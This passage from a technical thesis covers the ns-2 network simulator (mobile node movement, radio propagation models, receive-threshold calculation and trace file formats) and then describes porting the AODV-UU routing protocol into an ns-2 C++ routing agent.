However, after creating a mobile node, one has to disable the random motion feature of the node to prevent it from performing random movements on its own: set mobilenode_ [$ns_ node] $mobilenode_ random-motion Mobile node movements Mobile nodes may be moved within the topography of the simulation, and keep track of their current positions. Currently, movements are only possible in two dimensions (X and Y), although node positions and movements include a third (Z) value, which is ignored. This limitation implies that flat grid topologies currently are the only meaningful topologies in ns-2 simulations. 44 54 Initial positioning The initial position of a mobile node is specified by setting its X_, Y_ and Z_ instance variables: $mobilenode_ set X_ 10.0 $mobilenode_ set Y_ 20.0 $mobilenode_ set Z_ 0.0 For NAM (Network Animator) to be able to correctly place and draw nodes in a visualization of a simulation, all nodes must be passed to the simulator instance through an initial_node_pos <node> <size> command, where node is a mobile node and size is the desired node size in NAM: $ns_ initial_node_pos $mobilenode1_ 10 $ns_ initial_node_pos $mobilenode2_ Movement commands Mobile node movements are performed through the setdest command, which takes the desired x and y coordinates and a velocity (measured in m/s) as arguments. If one wishes to move the mobile node to these coordinates in a certain time, the velocity for doing so has to be calculated manually. $mobilenode_ setdest <x> <y> <velocity> Random motion Random motion can be used by issuing the random-motion 1 command to a mobile node. This command will cause the mobile node to perform motions according to a random-waypoint model [2] as soon as the node is given a start command. In such a model, the node performs movements in random directions with pauses in between. Movement pattern files It is also possible to move mobile nodes according to a movement pattern file. Such a file contains OTcl code with setdest movement commands scheduled at appropriate times, and may be generated either manually or with the setdest utility of the ns-2 distribution. A movement pattern file can easily be included in a simulation scenario script by asking the OTcl interpreter to source it, using the source "movement.tcl" command. This includes the specified file as if its contents had been inserted at that line, and allows for easy switching between different movement patterns while keeping the main parts of a simulation scenario script unchanged Routing in mobile networking Routing in mobile nodes is very different from routing in wired nodes. In a wired node, a routing module maintains a routing table, which is used by route logic to perform route computations (see section 5.7.4). These computations are then used by the classifiers of a node to find a wired link to forward packets on. In mobile nodes, the routing agent takes on all the responsibility for routing and forwarding. No routing table is kept in the mobile node itself; instead, the routing agent has to maintain such a routing table internally. No separate route logic is available to perform route computations; this has to be performed by the routing agent. Also, computed routes are not installed by modifying an address classifier. Instead, the address classifier usually has the routing agent set as its default target, and the routing agent itself has to perform the packet forwarding. Finally, this forwarding does not occur over wired links, but over a wireless channel. 
It is the responsibility of the routing agent to fill in the next_hop_ field of each packet that should be forwarded, before handing it down to the link layer of the mobile node.

Creating a routing agent is not very different from creating any other agent; it is simply attached to a special port number (RT_PORT, i.e., 255) in the port classifier of a mobile node. However, one has to make sure that the requirements of the routing agent (and the protocol that it implements) are met. Although most routing agents are placed as the default target of the address classifier in a node, some routing algorithms may require a different placement.

Currently, ns-2 includes routing agent implementations of four common routing protocols for wireless simulations: DSDV, AODV, DSR and TORA. However, the continuous updating of routing protocol specifications (and the lack of up-to-date implementations) has made some of these routing agents rather obsolete. For instance, the AODV routing agent supposedly adheres to version 6 of the AODV draft, which is several years old (and definitely outdated).

Miscellaneous features

In addition to wireless ad-hoc networking, the mobile networking portions of ns-2 also offer support for wired-cum-wireless scenarios, where mobile nodes communicate with base stations which act as gateways to a wired network. This is the common infrastructure seen in most wireless LANs today. Furthermore, ns-2 includes support for Mobile IP [46], where mobile hosts communicate with their home network through home agents and foreign agents. Neither of these additions was part of the CMU Monarch mobility extensions to ns-2; they were added later. Further documentation on wired-cum-wireless scenarios and Mobile IP can be found in [40].

5.16 Radio propagation models

Radio propagation models are used for calculating the received signal power of packets in wireless simulations. Based on the received signal power and thresholds, different actions may be taken for a packet. Either the signal is considered too weak, or the packet is marked as containing errors and thrown away by the MAC layer, or it is received correctly. Currently, there are three radio propagation models implemented in ns-2: the free space model, the two-ray ground reflection model and the shadowing model. Originally, all these models come from the domains of radio engineering and physics.

Free space model

The free space model [47], Propagation/FreeSpace, assumes a single, clear line-of-sight path between the transmitting and receiving nodes. It uses the formula in Equation 5.1 to calculate the received signal power at a distance d from the transmitter.

    P_r(d) = (P_t * G_t * G_r * λ^2) / ((4π)^2 * d^2 * L)        (5.1)

In this formula, P_t is the transmitted signal power, G_t is the antenna gain of the transmitter, G_r is the antenna gain of the receiver, L is the system loss and λ is the wavelength. In ns-2 simulations, it is very common to select G_t = G_r = 1 and L = 1.

Usage

Mobile nodes can be configured to use the free space model by issuing the node-config command of the simulator instance with the -proptype option set as follows (prior to node creation):

$ns_ node-config -proptype Propagation/FreeSpace

Two-ray ground reflection model

The two-ray ground reflection model, Propagation/TwoRayGround, considers not only a single line-of-sight path between nodes but also ground reflection. This model has been shown [48] to give more accurate predictions of the received power at long distances than the free space model. It uses the formula in Equation 5.2 to calculate the received signal power at a distance d from the transmitter.
    P_r(d) = (P_t * G_t * G_r * h_t^2 * h_r^2) / (d^4 * L)        (5.2)

In this formula, P_t is the transmitted signal power, G_t is the antenna gain of the transmitter, G_r is the antenna gain of the receiver, L is the system loss, h_t is the height of the transmitting antenna and h_r is the height of the receiving antenna.

However, at short distances, the two-ray ground reflection model does not give particularly good results due to oscillations caused by the combination of the two rays. Therefore, the two-ray ground reflection model in ns-2 calculates a crossover distance, d_c, for automatically switching between the free space model and the two-ray ground reflection model. The formula for the crossover distance is shown in Equation 5.3 (λ is the wavelength).

    d_c = (4π * h_t * h_r) / λ        (5.3)

When d < d_c, the free space model (Equation 5.1) is used. When d >= d_c, the two-ray ground reflection model (Equation 5.2) is used instead, since both models give the same results for d = d_c.

Usage

Mobile nodes can be configured to use the two-ray ground reflection model by issuing the node-config command of the simulator instance with the -proptype option set as follows (prior to node creation):

$ns_ node-config -proptype Propagation/TwoRayGround

Shadowing model

The shadowing model [48], Propagation/Shadowing, attempts to more realistically model multi-path propagation effects, i.e., fading. This model has two parts: a path loss model, which predicts the mean received signal power at the distance d from the transmitter, and a log-normal random variable, which models probabilistic communication between nodes at the edge of the radio range. The formula for the shadowing model is shown in Equation 5.4.

    [P_r(d) / P_r(d_0)]_dB = -10 * β * log10(d / d_0) + X_dB        (5.4)

In this log-normal shadowing model formula, P_r(d_0) is the received signal power at the reference distance d_0, P_r(d) is the received signal power at the distance d and X_dB is a Gaussian random variable with zero mean and standard deviation σ_dB. β is called the path loss exponent and σ_dB the shadowing deviation. These two values need to be set to determine the characteristics of the shadowing model. Some typical values are shown in Tables 5.4 and 5.5.

Table 5.4: Typical path loss exponent (β) values

Environment                         β
Outdoor, free space                 2
Outdoor, shadowed urban area        2.7-5
Indoor, line-of-sight               1.6-1.8
Indoor, obstructed area             4-6

Table 5.5: Typical shadowing deviation (σ_dB) values

Environment                         σ_dB (dB)
Outdoor                             4-12
Office, hard partition              7
Office, soft partition              9.6
Factory building, line-of-sight     3-6
Factory building, obstructed        6.8

Usage

Mobile nodes can be configured to use the shadowing model by setting its parameters and then issuing the node-config command of the simulator instance as follows (prior to node creation):

Propagation/Shadowing set pathlossexp_ 1.8   ;# path loss exponent
Propagation/Shadowing set std_db_ 4.0        ;# shadowing deviation (dB)
Propagation/Shadowing set dist0_ 1.0         ;# reference distance (m)
Propagation/Shadowing set seed_ 0            ;# RNG seed

$ns_ node-config -proptype Propagation/Shadowing

This uses the specified seed value for the random number generator. If one wishes to use another seeding method, this has to be specified, and the propagation instance passed to the node-config command:

set prop [new Propagation/Shadowing]
$prop set pathlossexp_ 1.8
$prop set std_db_ 4.0
$prop set dist0_ 1.0
$prop seed <seed-type> 0                     ;# seeding method (and value)
$ns_ node-config -propinstance $prop         ;# pass propagation instance

The <seed-type> seeding method parameter should be one of predef, raw and heuristic. A predefined seed provides a set of known good seeds, while a raw seed uses the extra parameter for specifying the seed value. These two seeding methods yield a deterministic behavior.
Finally, a heuristic seed uses the current time and a counter to generate a seed, and hence yields a non-deterministic behavior.

5.17 Communication range adjustment

Adjustment of the communication range in wireless networking is done in two steps. First, the characteristics of the network interface have to be set. This is typically done using technical specifications of a wireless network interface as a reference. Second, a receive threshold has to be calculated, based on the characteristics of the network interface and the selected radio propagation model.

Network interface characteristics

The parameters of the Phy/WirelessPhy network interface that need to be set are the following:

- Pt_, the transmission power in W (Watts).
- freq_, the frequency used for wireless communication.
- CPThresh_, the capture threshold. This value determines how much stronger a radio signal must be than one currently being received for capture to occur. It is measured in dB.
- CSThresh_, the carrier sense threshold. This value determines the minimal received power in W needed for the network interface to detect a transmission from another node.
- L_, the system loss. Normally set to 1.0.
- RXThresh_, the receive threshold. This value determines the minimal received power in W to be able to receive a packet. Calculation of this value is described below.
- bandwidth_, the bandwidth of the network interface. This does not affect the communication range, but should be set appropriately anyway.

Since signal powers are commonly measured in dBm (dB relative to 1 mW), the conversion formulas of Equations 5.5 and 5.6, from [49], could be useful during calculation of these values.

    P[dBm] = 10 * log10(P[W] * 1000)        (5.5)

    P[W] = 10^(P[dBm] / 10) / 1000        (5.6)

Receive threshold calculation

The receive threshold of the network interface is calculated by supplying its parameters, the radio propagation model and possibly parameters of the radio propagation model to a threshold utility that is part of the ns-2 distribution. This utility has the following syntax:

threshold -m <propagation-model> [options] <distance>

The propagation-model should be FreeSpace, TwoRayGround or Shadowing. The communication range, distance, is measured in metres. The additional options depend on which radio propagation model is used. The available options are listed below.

- -Pt <transmit-power> sets the transmission power, corresponding to Pt_ of the network interface.
- -fr <frequency> sets the frequency, corresponding to freq_ of the network interface.
- -Gt <transmit-antenna-gain> sets the gain of the transmitting antenna.
- -Gr <receive-antenna-gain> sets the gain of the receiving antenna.
- -L <system-loss> sets the system loss, corresponding to L_ of the network interface.
- -ht <transmit-height> sets the height of the transmitting antenna.
- -hr <receive-height> sets the height of the receiving antenna.
- -pl <path-loss-exponent> sets the path loss exponent (for the shadowing model).
- -std <shadowing-deviation> sets the shadowing deviation (for the shadowing model).
- -d0 <reference-dist> sets the reference distance (for the shadowing model).

It is important to check the output of the threshold utility to verify that all values are correct, since it assigns values for an ancient Lucent WaveLAN wireless network interface as default values. Finally, the RXThresh_ value given by the threshold utility should be set in the simulation scenario script along with the other settings of the network interface. A sketch of a threshold invocation is shown first, followed by a complete example where the data rates of the MAC layer are also configured.
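As an illustration, an invocation of the threshold utility for the two-ray ground reflection model could look as follows (the antenna gains, system loss and antenna heights are assumed values chosen for the sake of the example; the transmit power, frequency and distance match the scenario below):

threshold -m TwoRayGround -Pt 0.0316 -fr 2.472e9 -Gt 1 -Gr 1 -L 1 -ht 1.5 -hr 1.5 22.5

The receive threshold reported by the utility would then be copied into the RXThresh_ setting of the scenario script.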
The radio propagation model used for calculating the receive threshold in this example is the two-ray ground reflection model, and the values shown yield a communication range of 22.5 metres.

Phy/WirelessPhy set Pt_ 0.0316            ;# Tx power (W), 15 dBm
Phy/WirelessPhy set bandwidth_ 11Mb       ;# 11 Mbps bandwidth
Mac/802_11 set datarate_ 11Mb             ;# 11 Mbps for data
Mac/802_11 set basicrate_ 1Mb             ;# 1 Mbps for broadcasts
Phy/WirelessPhy set freq_ 2.472e9         ;# Europe, Channel 13, 2.472 GHz
Phy/WirelessPhy set CPThresh_ 10.0        ;# Capture threshold (dB)
Phy/WirelessPhy set CSThresh_ 5.012e-12   ;# Carrier sense threshold (W),
                                          ;# receiver sensitivity -83 dBm
Phy/WirelessPhy set L_ 1.0                ;# System loss
Phy/WirelessPhy set RXThresh_ <RXThresh>  ;# Receive threshold (W), from the
                                          ;# threshold utility (22.5 m),
                                          ;# given the other parameters

5.18 Trace files

Trace files or trace logs are an important part of a simulation, since they provide information on the events that occurred. Currently, ns-2 offers three different trace formats: an old trace format (very commonly used), a new trace format and a tagged trace format. Also, a special NAM trace format is used by NAM for its visualization of simulations.

Trace configuration

Tracing is configured by issuing commands to the simulator instance. The following commands are available:

use-newtrace selects the new trace format.
use-taggedtrace selects the tagged trace format.
trace-all $fd specifies that tracing should be performed to a trace file referenced by the fd file descriptor.
namtrace-all $namfd specifies that tracing should be performed to a NAM trace file referenced by the namfd file descriptor.
RTR = router, MAC = MAC layer, IFQ = interface queue, AGT = agent. 5. 6 UID (Unique ID) of the packet. 7 Packet type. 8 Packet size. 9-1 Expected time to send data. 9-2 Destination MAC address. 9-3 Source MAC address. 9-4 Type (800 = IP, 806 = ARP) IP source address Source port number IP destination address Destination port number TTL value Next hop address. 11 and up Packet-type specific trace information. New trace format An example of the new trace format is shown below. This trace format is not as easy to read as the old trace format, because of the (often) lengthy lines consisting of tag - value pairs. It is however well suited for parsing by trace log analysis utilities. A description of the most common contents is given in Table 5.7, and examples of application tags are given in Table 5.8. New tags will be introduced as new applications are added to ns-2 (if those applications choose to support the new trace format). s -t Hs 1 -Hd 0 -Ni 1 -Nx Ny Nz Ne Nl RTR -Nw --- -Ma 0 -Md 0 -Ms 0 -Mt 0 -Is Id It AODV -Il 40 -If 0 -Ii 24 -Iv 255 -P aodv -Pt 0x2 -Ph 0 -Pd 1 -Pds 0 -Pl Pc REPLY Tagged trace format This trace format was recently added to ns-2, and currently lacks documentation. It is similar to the new trace format, using tags and values, but the tag names must be determined by each object to be traced, making the coordination of tag names for this trace format more difficult. As a result, tag clashes are likely to occur. Anyone wishing to use this trace format should therefore investigate the existing tagged trace formats specified by the ns-2 tracing source code carefully. 52 62 Table 5.7: Trace log contents (new trace format) 1 Event type. r = received, s = sent, f = forwarded, D = dropped. -t Time. -t * Global setting. -Ni Node ID. -Nx X coordinate of node. -Ny Y coordinate of node. -Nz Z coordinate of node. -Ne Node energy level. -Nl Trace level (such as AGT, RTR or MAC). -Nw. -Is IP: Source address.port number -Id IP: Destination address.port number -It IP: Packet type. -Il IP: Packet size. -If IP: Flow ID. -Ii IP: UID (Unique ID) of the packet. -Iv IP: TTL value. -Hs Node ID of this node. -Hd Node ID of next hop. -Ma MAC: Duration. -Md MAC: Destination MAC address. -Ms MAC: Source MAC address. -Mt Type (800 = IP, 806 = ARP). Table 5.8: Example application-level trace log contents (new trace format) -P arp -Po ARP: ARP request/reply. -P arp -Pm ARP: Source MAC address. -P arp -Ps ARP: Source address. -P arp -Pa ARP: Destination MAC address. -P arp -Pd ARP: Destination address. -P cbr -Pi CBR: Sequence number. -P cbr -Pf CBR: Packet forwarding count. -P cbr -Po CBR: Optimal number of forwards. -P tcp -Ps TCP: Sequence number. -P tcp -Pa TCP: Acknowledgement number. -P tcp -Pf TCP: Packet forwarding count. -P tcp -Po TCP: Optimal number of forwards. 53 63 NAM trace format The NAM trace format is used by NAM (Network Animator) to visualize simulations. It is a tagged format, resembling the new trace format, and includes support for initialization, node, link, queue, agent and variable events. However, it is far too extensive to be described here. Full details on the NAM trace format can instead be found in [40] Problems encountered with ns-2 Following the in-depth review of ns-2 and its network components in the previous sections, some comments should be made regarding problems that one may encounter while using the ns-2 simulation environment. 
These comments are based on observations during the course of this master s thesis project, as well as several independent reports from individuals on the ns-users mailing list. Perhaps the most frequent criticism against the physical layer and MAC layer in wireless simulations is the difficulty of setting the wireless bandwidth correctly. Many reports indicate that even though the bandwidth and data rate is set to 11 Mbps, the actual throughput is limited to values far below this figure. Apparently, this issue has not been investigated thoroughly enough for a solution to be available. Another important topic, also related to wireless simulations, is the behavior of wireless broadcasts versus unicasts. The ns-2 model of the MAC layer offers separate transmission rate settings for broadcast and unicast network traffic (the basic rate and data rate, respectively), although this has no effect on the radio range of the transmission; it merely affects the time required for completing the transmission. This is also mentioned in Chapter 7, where, for this reason, some simulation results differ from real-world results. Finally, a problem related to post-run analysis and debugging should be noted. It is not uncommon for the ns-2 model of the MAC layer to drop packets without specifying any reason for doing so. Needless to say, this can make post-run analysis and interpretation of trace logs very cumbersome. Hopefully this will be rectified in a future release of ns Summary The ns-2 network simulator is the result of many years of hard work from a large number of contributors. Its modularity and flexibility has made it one of the most popular network simulators to use for research, and the support for mobile networking has contributed to its widespread usage for performing wireless and ad-hoc networking simulations. It is continuously updated with approximately one major release each year and minor versions in between, although some of its network components (most notably, routing agents) have become rather outdated due to lack of recent implementations. Since ns-2 still is under development, it should be treated as a valuable tool for conducting network simulations rather than the absolute truth. That, however, applies to all network simulators. 54 64 Chapter 6 Porting AODV-UU to ns Introduction This chapter describes the porting of AODV-UU [6] to the ns-2 network simulator [8]. The problems associated with this conversion are pointed out, a number of conversion approaches are reviewed, and finally, the actual conversion process is described. This conversion process is characterized by the ambition to use the same source code for the ported version of AODV-UU as for the conventional Linux version, to the extent this is possible. 6.2 Conversion overview Since routing in mobile nodes in ns-2 is performed by routing agents, the goal of the porting process is to create such a routing agent based on the AODV-UU source code. Each node will instantiate this routing agent, and use it for ad-hoc routing in a wireless networking scenario. Using the same source code for the ported version as for the conventional version requires a substantial amount of care; changes to the original source code should not affect AODV-UU during normal compilation. This calls for an ability to switch between the two versions, depending on whether the compilation should result in a Linux routing daemon or an ns-2 routing agent. 
6.3 Initial decisions Considering that AODV-UU was written in C, which is a subset of C++, and that network objects in ns-2 performing any kind of packet processing should be implemented in C++ rather than OTcl (according to the ns-2 manual [40]), the decision was made that the porting process should result in a C++ routing agent for ns-2. It was also decided that the existing AODV routing agent of ns-2 should serve as a template during the initial construction of the AODV-UU routing agent. 6.4 Similar projects During the initial phase of this project, similar projects were searched for. There exist many routing agents for ns-2, e.g. the ones that come as part of the ns-2 distribution (see section ), but none of these are the result of porting a C implementation to C++; they were implemented in C++ from the beginning. The closest match was a C++ TORA implementation [50], with support code for running it in ns-2. However, that implementation was also written in C++ from the beginning. Because of this, focus was put on locating general material on C to C++ conversions. Several useful books and documents on this topic were found, e.g. [51], [52], [53] and [54]. These were used during the porting process. 55 65 6.5 Areas of concern In this section, different areas of concern associated with the porting process are described. This is the main analysis part of the porting process. The issues described here were found by careful examination of the AODV-UU source code [6], the ns-2 source code [8] and the ns-2 manual [40]. It is assumed that the reader is acquainted with AODV-UU (described in Chapter 4) and ns-2 (described in Chapter 5) Environmental differences The execution environments of an AODV-UU routing daemon running in Linux and a routing agent in ns-2 are very different. In Linux, a single instance of the AODV-UU routing daemon is executed on each host, and uses a physical wireless network interface for its communication. In ns-2, routing agents are instantiated for each node in the simulation. All routing agent instances execute in the same environment, i.e., they all run on the same host, and hence must be able to co-exist without interfering with each other. Furthermore, routing agents do not have access to a real physical wireless network interface Network interfaces The AODV-UU routing daemon retrieves information about network interfaces during its initialization in the main module. For each network interface, the IP address, name, netmask and broadcast address is retrieved. No such information is kept for network interfaces (e.g. the Phy/WirelessPhy network interface) in ns-2. Instead, all addressing information is kept in each node, and packets carry all the information needed for transmission. Furthermore, support for multiple network interfaces and multiple wireless channels is still somewhat experimental in ns-2, and most routing agents do not support such operation Packet handling Packet reception The packet handling of the AODV-UU routing daemon can be divided into two parts; handling of AODV routing protocol control packets and handling of data packets. AODV control packets are received by the aodv_ socket_read() function of the aodv_socket module, whereas data packets are received by the packet_ input() function of the packet_input module. In ns-2, routing agents receive all incoming packets through a single recv() (receive) method. Packet types and contents have to be analyzed by this method to determine how packets should be processed. 
There are no sockets available, but agents achieve similar functionality by attaching themselves to the port classifier of a node, specifying the port number of interest. It should be noted that routing agents are always attached to port number 255 (RT_PORT) of a node, and hence, the port number for exchanging routing protocol control packets is 255 rather than any other port number (e.g. 654 in the case of AODV).

Packet types

In ns-2, packet types have to be created manually for specific purposes. Many common packet types are built-in, but they may not be as easy to use as in the real world. For instance, UDP packet processing would require the usage of a special Agent/UDP transport agent, which makes it more difficult for other agents to utilize UDP as part of their operation. A real-world application (such as the AODV-UU routing daemon) could use UDP sockets for the same purpose, without experiencing problems related to its position in the network stack.

Packet direction

The kernel module of AODV-UU uses Netfilter hooks for determining whether a packet is an incoming packet or an outgoing packet, and whether it should be routed or passed on to the system for forwarding. In ns-2, the direction of a packet can be determined by analyzing the direction_ field of its common header. This field is set to DOWN, UP or NONE depending on the direction of the packet. DOWN indicates that the packet is an outgoing packet, and UP that it is an incoming packet.

Packet transmission

The AODV-UU routing daemon sends outgoing packets through sockets, which are then caught by the hook for locally generated packets, NF_IP_LOCAL_OUT, processed by AODV-UU, caught by the post-routing hook, NF_IP_POST_ROUTING, and finally forwarded by the system. In ns-2, routing agents instead hand all outgoing packets to their default target (the link layer) after filling in the next_hop_ field of the common header. As a side note, this makes routing agents differ somewhat from other agents, whose default target instead is the node entry to allow generated packets to arrive at the routing agent for forwarding.

Kernel interaction

AODV-UU uses kernel interaction for updating the kernel routing table (the k_route module), sending ICMP messages to an application (the icmp module) and receiving packets on Netfilter hooks (the kaodv module). Obviously, no kernel interaction should be part of the execution of an ns-2 routing agent; the only environment offered to the routing agent is the ns-2 environment. The routing table is kept internal to the routing agent, ICMP messages are not passed to applications (because of the very limited application API upcalls provided by ns-2) and reception of packets is entirely performed through the recv() method of the routing agent.

Variables

The variables in the AODV-UU source code affect each routing daemon process separately. In ns-2, any variables exposed to the C++ environment will be globally available. Therefore, the instantiation of routing agents in ns-2 requires variables to be local to each routing agent instance.

Global variables

Global variables are used in AODV-UU for sharing global settings, such as configuration options, between all modules. It is a convenient way of sharing simple data, to avoid passing around information data structures everywhere. However, global variables of AODV-UU modules must not be global in a routing agent implementation. If they were, all routing agents would share the same variables, interfering with each other. Instead, these variables must be local to each routing agent instance.
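The following sketch, using a hypothetical configuration variable, illustrates the difference: instead of a file-scope global shared by every agent in the simulation, the variable becomes a data member of the routing agent class (which inherits from the ns-2 Agent base class), so that each instance carries its own copy.

/* Hypothetical example; the real AODV-UU configuration variables differ.
 * ns-2 headers (Agent, nsaddr_t, PT_AODVUU) are assumed to be available. */
#ifdef NS_PORT
/* ns-2 version: one copy per routing agent instance, initialized in the
 * AODVUU constructor rather than at its point of definition. */
class AODVUU : public Agent {
public:
    AODVUU(nsaddr_t id) : Agent(PT_AODVUU), hello_interval(1000) { /* ... */ }
protected:
    int hello_interval;
};
#else
/* Daemon version: a file-scope global shared by the single daemon process. */
int hello_interval = 1000;
#endif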
Static variables

Static variables offer hiding of information and functions from other modules, and are important for modularized software development in C. However, this information hiding may be unnecessary in an ns-2 routing agent, depending on whether a modularized approach is desired within the routing agent or not. AODV-UU uses static variables e.g. for hiding functions that should only be called from within a certain module and for hiding variables associated with a single module, such as the seeking list of the seek_list module and the send and receive buffers of the aodv_socket module.

Timers

The AODV-UU routing daemon uses the timeout of select() for scheduling the checking of its own timer queue in the timer_queue module. Handler functions are executed as timers expire, and the timeout of the select() timer is updated when events have been carried out. In ns-2, timers of the TimerHandler class are available for agents and other network objects to use, thereby allowing similar functionality to be achieved. A timer in ns-2 could replace the select() timer and examine the timer queue of the timer_queue module upon expiration. It should be noted, however, that such a timer would have to exist for each routing agent instance, since packet handling of different routing agent instances should be kept separate.

Logging

The logging portions in the debug module of AODV-UU pose yet another problem. In ns-2, these logging features have to be modified to allow for individual logging of events for each routing agent instance. Such a modification would have to use a sensible logfile naming scheme to avoid ambiguities.

Non-applicable features

AODV-UU has a number of features that are not relevant or directly applicable to simulations, for one reason or another. These features are listed below.

Internet gateway support. This feature implies that the host is connected to the Internet, allowing itself to function as a gateway for other nodes in the ad-hoc network. Such a feature is normally handled by base stations in a wireless LAN, which are connected to a wired network. However, since no Internet access is available in ns-2 simulations, this feature does not apply. Also, the experimental support for multiple wireless channels and network interfaces in ns-2 would currently make an implementation of such a feature cumbersome.

Specifying network interfaces to attach to. This does not apply to routing agents in ns-2, since their only means of communication is through a link layer, not through network interfaces. A routing agent does not know the exact layout of the network stack.

Daemon mode. The daemon mode option of AODV-UU refers to detaching the daemon from the console during startup by closing the stdin, stdout and stderr streams and executing the daemon in the background. This does not apply to routing agents in ns-2, since it is the ns-2 simulator itself that possibly should be detached from the console. Network components execute as part of the ns-2 environment, not as separate processes.

Version information and online help. This is not very useful in ns-2 simulations. The version of the AODV-UU routing agent, if considered important, should be made known to the user prior to installation. Similarly, the user should read the documentation accompanying the AODV-UU routing agent prior to running it, as with any other software.
6.6 Different approaches to conversion

Given the task of porting AODV-UU to run in the ns-2 network simulator, a number of conversion approaches are possible. Each approach determines how the original source code should be handled, and the results of a conversion. The approaches that have been considered are described in the following subsections, along with their respective advantages and disadvantages. The choice of a conversion approach heavily depends on the existing source code and the environment in which it should be executed. Therefore, the considerations described in section 6.5 should be kept in mind when such a choice is made. Finally, it should be noted that the approaches described here are by no means the only possible ones. Any programmer with good skills in analyzing source code, and perhaps some imagination, could create hybrid approaches to suit the conversion task at hand.

6.6.1 Monolithic class approach

In a monolithic class approach, all source code is placed in a single class. The resulting class need not have any relationship with other classes; it could exist on its own as a stand-alone class. The main advantage of this approach is its simplicity. It is very easy to incorporate existing source code into a single class, since there is no doubt about where to place the code. However, there are disadvantages as well. Name clashes of identifiers could cause problems, unless the original source code utilizes a decent scheme for naming functions and variables. Also, any structure prior to the conversion is lost, since all parts are collapsed to form the monolithic class. Therefore, this approach may be unsuitable for well-structured source code with a large number of similar identifiers.

Object-oriented approach

In an object-oriented approach, the intention is to arrange the original source code to form classes, of which objects may be instantiated. The suitability of this approach depends on the layout of the original source code and the ambition of the programmer. If the original source code lacks a modular structure, the conversion task could become tedious and very time-consuming. On the other hand, if the original source code is divided into separate modules, each with a clearly assigned task, these modules could form a good basis for the construction of corresponding classes. However, the programmer may still consider the task of converting a non-object-oriented program into an object-oriented one while preserving the original source code an inappropriate way of obtaining the desired results. It may be better to apply an object-oriented analysis to the original problem, and write an object-oriented version of the program from scratch.

Daemon approach

In a daemon approach, programs that execute as separate processes can be used as-is, provided that an appropriate interface is written and connected to the application wishing to use these processes. The advantage of this approach is that the original source code may remain unchanged. The problem instead lies in the ability to establish communication with the interface software. For instance, AODV-UU routing daemons could be attached to virtual network interfaces, and software between these virtual network interfaces and the ns-2 network simulator could convert data as needed. Hence, the complexity of modifying the original source code has moved to the interface software and its associated communication. An important aspect (and a disadvantage) of the daemon approach is resources.
It may not be possible to execute many daemons in parallel because of resource constraints. For instance, a large number of routing daemons running concurrently would not only consume a considerable amount of memory; they would also increase the workload of the machine on which they are executed. Furthermore, the daemon approach may be unsuitable because of constraints of the application utilizing the daemon processes. For instance, the application may not be able to keep up with the amount of data generated by all daemon processes in real-time. Finally, the real-time aspect itself may be a big disadvantage even though the application is able to cope with the data generated by the daemon processes, if the fastest possible execution is desired.

6.7 The porting process

In this section, one of the conversion approaches is selected and the task of porting AODV-UU to run in the ns-2 network simulator is described in detail. The resulting source code of this conversion, i.e., the source code of AODV-UU version 0.5, is available from the AODV-UU homepage [6].

Choice of conversion approach

For the porting of AODV-UU to run in the ns-2 network simulator, the monolithic class approach was chosen. The reasons for this choice were the following:

The contents of the source code do not justify creating classes for instantiation of objects. Entries of linked lists, such as routing table entries and seeking list entries, are the only dynamically allocated objects that would be useful to instantiate. Most other objects exist in only one instance.

The simplicity of the monolithic class approach. During the initial phase of the project, it was uncertain whether a conversion was possible, and to what extent the original source code would have to be modified.

The layout of routing agents in ns-2. Most routing agents contain only one (or very few) modules to be compiled with ns-2.

A daemon approach would require usage of the real-time scheduler of ns-2. This scheduler has proven to work poorly, complaining about system time running backwards and crashing the simulator. These problems have been reported by several ns-2 users on the ns-users mailing list [57] as well. Furthermore, usage of the real-time scheduler does not utilize the full processing capability of the simulator and the computer. Time-consuming simulation scenarios would take a long time to run. Finally, it was not clear how the interface between AODV-UU routing daemons and the simulator should be realized.

The goal of the project was not to create an object-oriented version of AODV-UU, but to use the existing (non-object-oriented) source code with as few modifications as possible.

Conceptual overview

The ideas proposed for the porting process were the following. The original source code should form a single, monolithic C++ routing agent class, which should be possible to instantiate in the ns-2 environment (both in C++ and OTcl). Parts of the original source code should be automatically extracted and put into the correct places of this class by the preprocessor. This involves one or more passes of source code extraction for each source code file, using preprocessor directives and macros. Such preprocessing constructs should be logically defined such that they do not affect the original source code during normal compilation, i.e., compilation of an AODV-UU routing daemon. Furthermore, the separate compilation of each module of AODV-UU should be preserved.
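The following sketch indicates how a module header prepared for such multi-pass extraction might be laid out. The NS_NO_GLOBALS and NS_NO_DECLARATIONS macros are described in detail later in this chapter; the function names used here are illustrative, and the real AODV-UU header files may differ.

/* Illustrative layout of an AODV-UU module header prepared for
 * multi-pass extraction; not a verbatim copy of the real source. */
#ifndef SEEK_LIST_H
#define SEEK_LIST_H

#ifndef NS_NO_GLOBALS
/* First pass: global data types, defines and global declarations,
 * extracted outside the AODVUU class declaration. */
struct seek_list_entry {
    /* ... */
};
#endif /* NS_NO_GLOBALS */

#ifndef NS_NO_DECLARATIONS
/* Second pass: function declarations.  When extracted inside the AODVUU
 * class declaration, these become method declarations of the class. */
void seek_list_insert(u_int32_t dest_addr);
void seek_list_remove(u_int32_t dest_addr);
#endif /* NS_NO_DECLARATIONS */

#endif /* SEEK_LIST_H */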
The details of the porting process are described in the following subsections.

The AODVUU class

The AODV-UU routing agent class is called AODVUU, and its definition is placed in an aodv-uu.h header file. The main methods of this class, offering basic routing agent functionality, are placed in a corresponding aodv-uu.cc source code file. OTcl linkage is performed in aodv-uu.cc by a static TclClass instance.

Methods

All function definitions in the AODV-UU source code are prepended with a special NS_CLASS macro, which defines these functions to be methods of the AODVUU class. Their declarations are automatically placed inside the class by the preprocessor, as described in section . The following are the main methods of the AODVUU class:

AODVUU(nsaddr_t id) is the constructor of the AODVUU class, and takes the node ID of the node to which the routing agent is attached as an argument. It sets up an AODV-UU packet type by calling the Agent base class constructor with the packet type as a parameter. A faked network interface with the name nsif is created, and its parameters are initialized using the address of the agent. The constructor also binds configuration variables to the OTcl environment, initializes the data structures of AODV-UU (the timer queue, routing table and packet queue) and calls initialization methods of other modules.

~AODVUU() is the destructor of the AODVUU class. It destroys the contents of the routing table, destroys any packets buffered by the packet_input module, and closes the logfiles.

void schedulenextevent() checks the next event to occur in the timer queue of the timer_queue module, and schedules an ns-2 timer of the AODVUU class to expire at the time of that event. This method should be called as soon as it is possible that the timer queue has changed, e.g. after processing packets. This construct is the equivalent of the select() timeout used in the AODV-UU routing daemon.

